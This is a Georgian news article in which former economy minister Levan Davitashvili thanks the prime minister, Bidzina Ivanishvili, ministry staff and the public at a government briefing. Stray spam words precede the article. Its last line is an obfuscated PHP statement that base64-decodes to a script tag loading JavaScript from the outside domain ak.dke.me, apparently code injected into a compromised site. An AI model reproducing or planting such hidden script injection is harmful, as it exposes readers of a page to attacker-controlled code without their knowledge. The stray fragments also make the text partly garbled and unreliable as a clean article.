gorgia
jaluzi

მინდა შემთხვევით ვისარგებლო და განსაკუთრებული მადლობა გადავუხადო პარტია "ქართული ოცნების" დამფუძნებელს, ბატონ ბიძინა ივანიშვილს, რომელმაც საშუალება მომცა, წლების განმავლობაში სხვადასხვა მაღალ სახელმწიფო თანამდებობებზე მემუშავა, - ამის შესახებ მთავრობის ადმინისტრაციაში ბრიფინგზე განაცხადა ეკონომიკის ყოფილმა მინისტრმა ლევან დავითაშვილმა. 

"მინდა განსაკუთრებული მადლობა გადაგიხადოთ ბატონო პრემიერ-მინისტრო იმისთვის, რომ მოგვეცა საშუალება წელიწადზე მეტი ხნის განმავლობაში ერთად გვემუშავა და ქვეყნისთვის საკმაოდ რთულ დროს, უზრუნველგვეყო ეკონომიკური ზრდა და სტაბილური განვითარება. იმედი მაქვს, ახალ ფორმატში შევძლებთ მნიშვნელოვანი სტრატეგიული პროექტების კიდევ უფრო დაჩქარებას, კოორდინირებას, რომელიც ქვეყნის შემდგომი განვითარებისთვის არის ძალიან მნიშვნელოვანი.

მინდა შემთხვევით ვისარგებლო და განსაკუთრებული მადლობა გადავუხადო პარტია "ქართული ოცნების" დამფუძნებელს, ბატონ ბიძინა ივანიშვილს, რომელმაც საშუალება მომცა, წლების განმავლობაში სხვადასხვა მაღალ სახელმწიფო თანამდებობებზე მემუშავა და სხვადასხვა მიმართულებით გარკვეული წარმატებებით წვლილი შეგვეტანა ქვეყნის განვითარებაში. ვფიქრობ, ეს უნიკალური შანსი იყო, რომელიც ჩემთვის პირადად არის დაუვიწყარი, როდესაც ემსახურები ქვეყანას და შეგიძლია მცირეოდენი წვლილი შეიტანო მის განვითარებაში.

მინდა წარმატებები ვუსურვო მარიამს. ეკონომიკის სამინისტროში ყველა გახარებული ვართ, რომ სამინისტროს ცხოვრებაში ახალი ეტაპი იწყება. ვფიქრობ, კიდევ ბევრი რამ გაკეთდება.

მინდა მადლობა გადავუხადო ეკონომიკის სამინისტროს თითოეულ თანამშრომელს, უმაღლესი დონის პროფესიონალებს, პატრიოტ ადამიანებს.

ასევე, მოსახლეობას მინდა დიდი მადლობა გადავუხადო მხარდაჭერისთვის",- თქვა ლევან დავითაშვილმა.

284
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");